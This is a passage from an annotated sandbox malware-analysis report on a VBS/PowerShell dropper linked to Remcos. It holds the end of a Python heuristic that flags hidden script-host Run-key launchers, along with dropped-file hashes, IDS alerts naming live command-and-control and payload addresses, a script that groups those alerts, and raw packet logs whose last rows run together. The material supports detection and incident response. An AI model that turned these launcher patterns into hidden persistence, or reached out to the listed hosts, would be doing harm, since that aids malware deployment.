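                "'C:\\Users\\user\\AppData\\Local\\Temp\\sostener.vbs'")
# Constructed benign control entry.
BENIGN_NAME = "OneDrive"
BENIGN_VALUE = "\"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"


@dataclass
class Verdict:
    score: int = 0
    reasons: list = field(default_factory=list)

    def add(self, points: int, reason: str) -> None:
        self.score += points
        self.reasons.append(reason)


def score_command_line(cmd: str) -> Verdict:
    """Score one command line for signs of a hidden script-host launcher."""
    v = Verdict()
    lower = cmd.lower()
    # Image name: first token, with surrounding quotes and the path stripped.
    first = re.split(r"[\s\"']+", lower.strip("\"' "))[0]
    image = first.rsplit("\\", 1)[-1]
    if image in SCRIPT_HOSTS or any(h in lower for h in ("wscript.exe", "cscript.exe", "mshta.exe")):
        v.add(3, "launches a script host (powershell/wscript/cscript/mshta)")
    if re.search(r"-w(indowstyle)?\s+hidden|//b\b|//nologo", lower):
        v.add(2, "hides the window or suppresses the script-host banner")
    if re.search(r"\\temp\\", lower):
        v.add(2, "target lives in a Temp directory")
    if re.search(r"\.(vbs|vbe|js|jse|wsf|hta|ps1)\b", lower):
        v.add(1, "executes a script file")
    if re.search(r"-e(nc|ncodedcommand)?\s", lower) or "frombase64string" in lower:
        v.add(2, "carries an encoded or base64-decoded payload")
    return v


def score_run_value(name: str, value: str) -> Verdict:
    """Score a Run-key value: its command line plus the value name itself."""
    v = score_command_line(value)
    # A name made only of punctuation tells the user nothing and is chosen to
    # be overlooked; the report's value name is just underscores and hyphens.
    if not re.search(r"[A-Za-z0-9]", name):
        v.add(2, "value name contains no alphanumeric characters")
    return v


def is_suspicious(name: str, value: str, threshold: int = 5) -> bool:
    """Threshold is an assumption: a hidden script host in Temp alone scores 7."""
    return score_run_value(name, value).score >= threshold


if __name__ == "__main__":
    for n, val in ((RUN_NAME, RUN_VALUE), ("(xx2.vbs launcher)", LAUNCHER_CMD),
                   (BENIGN_NAME, BENIGN_VALUE)):
        verdict = score_run_value(n, val)
        print(f"{n!r}: score={verdict.score} reasons={verdict.reasons}")
```

The same scoring applies to Sysmon event ID 13 (registry value set) on the Run keys and to event ID 1 command lines, which is where a detection engineer would wire it in; the name check matters because the value name is the only field that survives when the attacker later swaps the command line.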
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.7330917840729887
                                  Encrypted:false
                                  SSDEEP:96:rxClD33CxHUekvhkvCCtRgR+wcFHagR+wcuH8:rxqDy0KRgR+agR+x
                                  MD5:A744E2C8B26AA3C8A03A6A5F1ED8A084
                                  SHA1:1FDB6F86E22003BFB4CF65A80300586D793FFDC3
                                  SHA-256:7F3BAD08863DB69A3DCD89C3C1059F2A4E37D12D7621945DAC4CAD78BCD049E5
                                  SHA-512:1A4A3E2D32468CFDBFE92E262DBC94DD59B40C056A786468D76BF991F616C55C100467D81DE44611F6D9B4DB8A1B5A090CF2CEB5629D8B037E93F2C091B51D2D
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...-/.v....0q......z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....Q.f......!..........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^:Y.F...........................%..A.p.p.D.a.t.a...B.V.1.....:Y.F..Roaming.@......CW.^:Y.F..........................;...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^:Y.F..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^DWR`..........................-...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^:Y.F....Q...........
                                   (Two further dropped-file records follow that are identical in every field to the entry above: a 6221-byte file of type data, MD5 A744E2C8B26AA3C8A03A6A5F1ED8A084, written by C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. They are not repeated here.)
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.7309651448541743
                                  Encrypted:false
                                  SSDEEP:96:rOClX33CZwUekvhkvCCtRgR+wcuHagR+wcuH8:rOqXilKRgR+dgR+x
                                  MD5:40FB4482C30FF5A6416950B365DE1DB8
                                  SHA1:63F6155A122B4B337C05729E64CF821694AE3DBC
                                  SHA-256:FE5B3CD4F65BBA98B1266D944ABE9609D4B52DF7F1F2A7884C299681FDEB75B7
                                  SHA-512:BFC06671764FE3419B7BE967822BA7A68BAC3F43F662160A8A288ED56A46E0E7C03F7054EC08D120CEE6F0F42AAB4FF511A5BDBEB46B8EDE3F3B142D3DFFE59C
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...-/.v....0q......z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....Q.f.....(...........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^:Y.F...........................%..A.p.p.D.a.t.a...B.V.1.....:Y.F..Roaming.@......CW.^:Y.F..........................;...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^:Y.F..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^:Y.F..........................-...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^:Y.F....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^:Y.F....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^:Y.F..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^:Y.F....Q...........
                                  File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Entropy (8bit):3.340780405236786
                                  TrID:
                                  • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                  • MP3 audio (1001/1) 33.33%
                                  File name:sostener.vbs
                                  File size:449'448 bytes
                                  MD5:e260955361dc0c8454fcfa061a45f6f1
                                  SHA1:bb77b8e3ef1c8d30cb5dbb90725d34e3c7602e13
                                  SHA256:e9cc243923de94787673438f26c30baefe9995b38c8b8047b95726b998baf26c
                                  SHA512:2f6572ecf6169a33c4cd273c0a9d8fd158e4e9230bb3c0489f3ca8bd0884c784d2372dcc09a6438f178ec2e8a27ccd37b1de3771b6a6cc6485d8d220bc3fa202
                                  SSDEEP:96:WDT/c7lY88ky0xbFi1msq4VIAGYAjrGzrD5UbF:W3/OlY88kyIhi1msLVIAGYAUvGF
                                  TLSH:E8A4123D9B42848C95B230478EAA16ACC99613783F8E7FA9836142D0647F739DF5CDE1
                                  File Content Preview:......'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.....'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C
                                  Icon Hash:68d69b8f86ab9a86
                                   Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                   2024-09-26T10:55:10.411734+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49731 | 15.235.85.194 | 443 | TCP
                                   2024-09-26T10:55:11.212861+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49732 | 15.235.85.194 | 443 | TCP
                                   2024-09-26T10:55:11.388506+0200 | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 15.235.85.194 | 443 | 192.168.2.4 | 49732 | TCP
                                   2024-09-26T10:55:11.388506+0200 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 15.235.85.194 | 443 | 192.168.2.4 | 49732 | TCP
                                   2024-09-26T10:55:14.186081+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49733 | 173.208.241.155 | 8888 | TCP
                                   2024-09-26T10:55:15.283452+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.4 | 49734 | 178.237.33.50 | 80 | TCP
                                   2024-09-26T10:55:30.032957+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49742 | 15.235.85.194 | 443 | TCP
                                   2024-09-26T10:55:30.849070+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49743 | 15.235.85.194 | 443 | TCP
                                   2024-09-26T10:55:31.026081+0200 | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 15.235.85.194 | 443 | 192.168.2.4 | 49743 | TCP
                                   2024-09-26T10:55:31.026081+0200 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 15.235.85.194 | 443 | 192.168.2.4 | 49743 | TCP
                                   2024-09-26T10:55:37.895610+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49745 | 15.235.85.194 | 443 | TCP
                                   2024-09-26T10:55:38.692655+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49746 | 15.235.85.194 | 443 | TCP
                                   2024-09-26T10:55:38.866932+0200 | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 15.235.85.194 | 443 | 192.168.2.4 | 49746 | TCP
                                   2024-09-26T10:55:38.866932+0200 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 15.235.85.194 | 443 | 192.168.2.4 | 49746 | TCP
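The alert table mixes both traffic directions: the downloader-header rules fire on the sandbox's requests to 15.235.85.194:443, the two EXPLOIT_KIT rules fire on that server's responses, and a naive group-by on source/destination would therefore split one endpoint into two. The following is an added example (not part of the Joe Sandbox report and not Suricata code) that folds the alerts into one indicator per remote endpoint; the rows in ALERTS are transcribed from the first six lines of the table above, and the rule that the remote side is the non-private address is an assumption that holds for this sandbox (192.168.2.0/24) but must be changed when a C2 sits in RFC 1918 space.

```python
"""Collapse IDS alerts that fire in both directions into one indicator per
remote endpoint.

Added example; not part of the Joe Sandbox report and not Suricata code.
ALERTS is transcribed from the first six rows of the report's alert table.
The 'remote side is the non-private address' rule is an assumption.
"""
import ipaddress

# (timestamp, sid, signature, severity, src_ip, src_port, dst_ip, dst_port, proto)
ALERTS = [
    ("2024-09-26T10:55:10.411734+0200", 2803305,
     "ETPRO MALWARE Common Downloader Header Pattern H", 3,
     "192.168.2.4", 49731, "15.235.85.194", 443, "TCP"),
    ("2024-09-26T10:55:11.212861+0200", 2803305,
     "ETPRO MALWARE Common Downloader Header Pattern H", 3,
     "192.168.2.4", 49732, "15.235.85.194", 443, "TCP"),
    ("2024-09-26T10:55:11.388506+0200", 2020423,
     "ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1", 1,
     "15.235.85.194", 443, "192.168.2.4", 49732, "TCP"),
    ("2024-09-26T10:55:11.388506+0200", 2020424,
     "ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1", 1,
     "15.235.85.194", 443, "192.168.2.4", 49732, "TCP"),
    ("2024-09-26T10:55:14.186081+0200", 2036594,
     "ET JA3 Hash - Remcos 3.x/4.x TLS Connection", 1,
     "192.168.2.4", 49733, "173.208.241.155", 8888, "TCP"),
    ("2024-09-26T10:55:15.283452+0200", 2803304,
     "ETPRO MALWARE Common Downloader Header Pattern HCa", 3,
     "192.168.2.4", 49734, "178.237.33.50", 80, "TCP"),
]


def remote_endpoint(src_ip, src_port, dst_ip, dst_port):
    """(ip, port) of the non-private side, whichever direction the alert fired."""
    src_priv = ipaddress.ip_address(src_ip).is_private
    dst_priv = ipaddress.ip_address(dst_ip).is_private
    if src_priv and not dst_priv:
        return dst_ip, dst_port
    if dst_priv and not src_priv:
        return src_ip, src_port
    return dst_ip, dst_port  # both private or both public: keep as written


def summarize(alerts):
    """Group alerts by remote endpoint. Suricata severity 1 is the most severe."""
    out = {}
    for ts, sid, sig, sev, sip, sport, dip, dport, _proto in alerts:
        key = remote_endpoint(sip, sport, dip, dport)
        rec = out.setdefault(key, {"first_seen": ts, "alerts": 0, "severity": sev,
                                   "sids": set(), "signatures": set(), "c2": False})
        rec["alerts"] += 1
        rec["severity"] = min(rec["severity"], sev)
        rec["first_seen"] = min(rec["first_seen"], ts)  # ISO timestamps, same offset
        rec["sids"].add(sid)
        rec["signatures"].add(sig)
        # A family-specific TLS fingerprint rule is treated as confirmed C2.
        if "remcos" in sig.lower():
            rec["c2"] = True
    return out


def indicator_lines(summary):
    """Render 'ip:port severity=N alerts=M [C2]' lines, most severe first."""
    rows = sorted(summary.items(),
                  key=lambda kv: (kv[1]["severity"], -kv[1]["alerts"]))
    return [f"{ip}:{port} severity={r['severity']} alerts={r['alerts']}"
            + (" C2" if r["c2"] else "")
            for (ip, port), r in rows]


if __name__ == "__main__":
    for line in indicator_lines(summarize(ALERTS)):
        print(line)
```

Read together with the "Yara detected Powershell download and execute" verdict in the overview, the 15.235.85.194:443 endpoint is the second-stage retrieval (the "b64" rules match base64-looking content in the server response), while 173.208.241.155:8888 is the Remcos C2 identified by its JA3 fingerprint; the EXPLOIT_KIT label on its own is not evidence of a browser exploit kit.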
                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                   Sep 26, 2024 10:55:08.990690947 CEST | 49730 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:08.990726948 CEST | 443 | 49730 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:08.990816116 CEST | 49730 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:09.000133038 CEST | 49730 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:09.000143051 CEST | 443 | 49730 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:09.484273911 CEST | 443 | 49730 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:09.484344006 CEST | 49730 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:09.488344908 CEST | 49730 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:09.488358021 CEST | 443 | 49730 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:09.488760948 CEST | 443 | 49730 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:09.500490904 CEST | 49730 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:09.547405958 CEST | 443 | 49730 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:09.627069950 CEST | 443 | 49730 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:09.636584044 CEST | 443 | 49730 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:09.636609077 CEST | 443 | 49730 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:09.636744022 CEST | 443 | 49730 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:09.636773109 CEST | 49730 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:09.636806011 CEST | 49730 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:09.639601946 CEST | 49730 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:09.790766954 CEST | 49731 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:09.790819883 CEST | 443 | 49731 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:09.791007996 CEST | 49731 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:09.791286945 CEST | 49731 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:09.791305065 CEST | 443 | 49731 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:10.268940926 CEST | 443 | 49731 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:10.269062996 CEST | 49731 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:10.270406961 CEST | 49731 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:10.270421028 CEST | 443 | 49731 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:10.270925999 CEST | 443 | 49731 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:10.271728992 CEST | 49731 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:10.319397926 CEST | 443 | 49731 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:10.411858082 CEST | 443 | 49731 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:10.420972109 CEST | 443 | 49731 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:10.420996904 CEST | 443 | 49731 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:10.421103001 CEST | 49731 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:10.421143055 CEST | 443 | 49731 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:10.421210051 CEST | 49731 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:10.499772072 CEST | 443 | 49731 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:10.499831915 CEST | 443 | 49731 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:10.499892950 CEST | 49731 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:10.499922991 CEST | 443 | 49731 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:10.499957085 CEST | 49731 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:10.499979019 CEST | 49731 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:10.507863045 CEST | 443 | 49731 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:10.507947922 CEST | 443 | 49731 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:10.507965088 CEST | 49731 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:10.507985115 CEST | 443 | 49731 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:10.508018017 CEST | 49731 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:10.508043051 CEST | 49731 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:10.585284948 CEST | 443 | 49731 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:10.585371971 CEST | 49731 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:10.585391998 CEST | 443 | 49731 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:10.585423946 CEST | 443 | 49731 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:10.585484028 CEST | 49731 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:10.585766077 CEST | 49731 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:10.588675976 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:10.588783026 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:10.588857889 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:10.589631081 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:10.589665890 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.062702894 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.064421892 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.064502954 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.212946892 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.264199972 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.299629927 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.299658060 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.299695015 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.299704075 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.299720049 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.299730062 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.299751043 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.299757957 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.299782991 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.299784899 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.299801111 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.299840927 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.300497055 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.300549030 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.300566912 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.300580025 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.300605059 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.300623894 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.313999891 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.314050913 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.314076900 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.314085007 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.314116955 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.314138889 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.386954069 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.387051105 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.387083054 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.387114048 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.387150049 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.387183905 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.388562918 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.388606071 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.388638020 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.388673067 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.388710022 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.388731003 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.400227070 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.400279045 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.400326967 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.400348902 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.400377035 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.400394917 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.473074913 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.473134041 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.473176003 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                   Sep 26, 2024 10:55:11.473220110 CEST | 443 | 49732 | 15.235.85.194 | 192.168.2.4
                                   Sep 26, 2024 10:55:11.473251104 CEST | 49732 | 443 | 192.168.2.4 | 15.235.85.194
                                  Sep 26, 2024 10:55:11.473273993 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.473514080 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.473560095 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.473582983 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.473596096 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.473625898 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.473647118 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.474421024 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.474469900 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.474498987 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.474512100 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.474539042 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.474723101 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.475332975 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.475425005 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.475425005 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.475454092 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.475488901 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.475516081 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.476279020 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.476320982 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.476347923 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.476360083 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.476387024 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.476406097 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.487102032 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.487148046 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.487175941 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.487188101 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.487216949 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.487236977 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.487900019 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.487942934 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.487958908 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.487972021 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.488003016 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.488023043 CEST49732443192.168.2.415.235.85.194
